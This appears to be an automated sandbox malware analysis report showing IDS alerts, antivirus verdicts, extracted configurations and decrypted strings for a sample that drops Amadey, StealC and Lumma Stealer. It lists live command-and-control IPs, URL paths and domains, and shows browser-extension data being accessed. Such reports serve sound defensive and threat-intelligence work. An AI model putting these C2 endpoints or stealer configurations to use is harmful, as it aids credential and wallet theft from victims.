2024-12-14T12:57:03.152787+0100	2057973	1	Domain Observed Used for C2 Detected	192.168.2.4	49378	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:03.377174+0100	2057975	1	Domain Observed Used for C2 Detected	192.168.2.4	56967	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:18.712771+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	60444	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:22.376421+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	49476	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:22.152756+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	65102	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:02.676111+0100	2057979	1	Domain Observed Used for C2 Detected	192.168.2.4	51431	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:21.883337+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	62630	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:02.905570+0100	2057977	1	Domain Observed Used for C2 Detected	192.168.2.4	50441	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:15.400163+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	51371	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:03.887452+0100	2057969	1	Domain Observed Used for C2 Detected	192.168.2.4	63066	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:03.603609+0100	2057971	1	Domain Observed Used for C2 Detected	192.168.2.4	59192	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:02.215765+0100	2057983	1	Domain Observed Used for C2 Detected	192.168.2.4	49239	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:23.129640+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	52224	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:22.605132+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	59059	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:02.436241+0100	2057981	1	Domain Observed Used for C2 Detected	192.168.2.4	62810	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:33.992412+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49834	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:33.871396+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49834	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:34.320749+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49834	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:35.962072+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49834	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:34.634163+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49834	TCP
2024-12-14T12:57:16.088218+0100	2044247	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.4	49989	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:18.391374+0100	2051831	1	Malware Command and Control Activity Detected	116.203.10.31	443	192.168.2.4	49996	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:57:16.087731+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49989	116.203.10.31	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:33.422758+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:57:23.986787+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50021	185.215.113.206	80	TCP
2024-12-14T12:57:35.563087+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50085	185.215.113.206	80	TCP
2024-12-14T13:00:32.884921+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50245	185.215.113.206	80	TCP
2024-12-14T13:00:47.304272+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50250	185.215.113.206	80	TCP
2024-12-14T13:01:11.566265+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50295	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:05.292058+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49748	185.215.113.43	80	TCP
2024-12-14T13:01:10.890658+0100	2856147	1	A Network Trojan was detected	192.168.2.4	50294	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:13.058200+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49759	TCP
2024-12-14T13:00:23.470760+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	50241	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:09.753300+0100	2803305	3	Unknown Traffic	192.168.2.4	49760	31.41.244.11	80	TCP
2024-12-14T12:56:15.940660+0100	2803305	3	Unknown Traffic	192.168.2.4	49778	185.215.113.16	80	TCP
2024-12-14T12:56:23.015017+0100	2803305	3	Unknown Traffic	192.168.2.4	49796	185.215.113.16	80	TCP
2024-12-14T12:56:31.517643+0100	2803305	3	Unknown Traffic	192.168.2.4	49827	185.215.113.16	80	TCP
2024-12-14T12:56:41.921043+0100	2803305	3	Unknown Traffic	192.168.2.4	49860	31.41.244.11	80	TCP
2024-12-14T12:56:54.835915+0100	2803305	3	Unknown Traffic	192.168.2.4	49913	31.41.244.11	80	TCP
2024-12-14T12:57:01.640223+0100	2803305	3	Unknown Traffic	192.168.2.4	49939	31.41.244.11	80	TCP
2024-12-14T12:57:07.809888+0100	2803305	3	Unknown Traffic	192.168.2.4	49961	31.41.244.11	80	TCP
2024-12-14T12:57:10.301976+0100	2803305	3	Unknown Traffic	192.168.2.4	49970	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:36.757164+0100	2803304	3	Unknown Traffic	192.168.2.4	49834	185.215.113.206	80	TCP
2024-12-14T12:56:54.514160+0100	2803304	3	Unknown Traffic	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:56:56.599198+0100	2803304	3	Unknown Traffic	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:56:58.131939+0100	2803304	3	Unknown Traffic	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:56:59.416469+0100	2803304	3	Unknown Traffic	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:57:02.973239+0100	2803304	3	Unknown Traffic	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:57:04.671453+0100	2803304	3	Unknown Traffic	192.168.2.4	49886	185.215.113.206	80	TCP
2024-12-14T12:57:11.064296+0100	2803304	3	Unknown Traffic	192.168.2.4	49975	185.215.113.16	80	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-14T12:56:25.763387+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49804	23.55.153.106	443	TCP
2024-12-14T12:57:06.810464+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49953	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://sordid-snaked.cyou/api4l	Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/api	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000003.1723413141.0000000004B10000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "bellflamre.click", "diffuculttan.xyz", "wrathful-jammy.cyou", "effecterectz.xyz", "debonairnukk.xyz", "deafeninggeh.biz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 54%			Perma Link
Source: file.exe	ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PK13K1G[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: sordid-snaked.cyou
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: awake-weaves.cyou
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: wrathful-jammy.cyou
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: debonairnukk.xyz
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: diffuculttan.xyz
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: effecterectz.xyz
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: deafeninggeh.biz
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: immureprech.biz
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: bellflamre.click
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: - Screen Resoluton:
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: Workgroup: -
Source: 8.2.PK13K1G.exe.400000.1.raw.unpack	String decryptor: LPnhqo--nbgnxdlxdnyo

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.145:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.4:49964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.193.91:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50070 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.4:50345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50361 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50408 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50412 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50411 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50409 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50407 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50410 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: acdee533dd.exe, 0000001A.00000002.3110841430.000000006BE0D000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: nss3.pdb@ source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: nss3.pdb source: acdee533dd.exe, 0000001A.00000002.3112440122.000000006BFCF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e2def46cb9.exe, 0000001F.00000002.2797872424.0000000000BE2000.00000040.00000001.01000000.00000016.sdmp, e2def46cb9.exe, 0000001F.00000003.2659680369.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: acdee533dd.exe, 0000001A.00000002.3110841430.000000006BE0D000.00000002.00000001.01000000.0000001A.sdmp

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_0002BE9A FindFirstFileExW,	6_2_0002BE9A
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_0002BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_0002BF4B
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0103DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	9_2_0103DBBE
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0104698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_0104698F
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_010468EE FindFirstFileW,FindClose,	9_2_010468EE
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0103D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	9_2_0103D076
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0103D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	9_2_0103D3A9
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_0104979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_0104979D
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01049642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	9_2_01049642
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01049B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	9_2_01049B2B
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01045C97 FindFirstFileW,FindNextFileW,FindClose,	9_2_01045C97

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov ecx, edx	8_2_0040B2AE
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then push eax	8_2_0040B71E
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	8_2_0043D050
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00433060
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	8_2_004280D8
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7947E592h]	8_2_004158DC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-369690EFh]	8_2_0040C896
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then mov ecx, eax	8_2_0041B0A1
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7947E66Ah]	8_2_004198A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7947E66Ah]	8_2_004198A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	8_2_004198A0
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+20h]	8_2_0043C920
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]	8_2_0040D926
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	8_2_0043D9C0
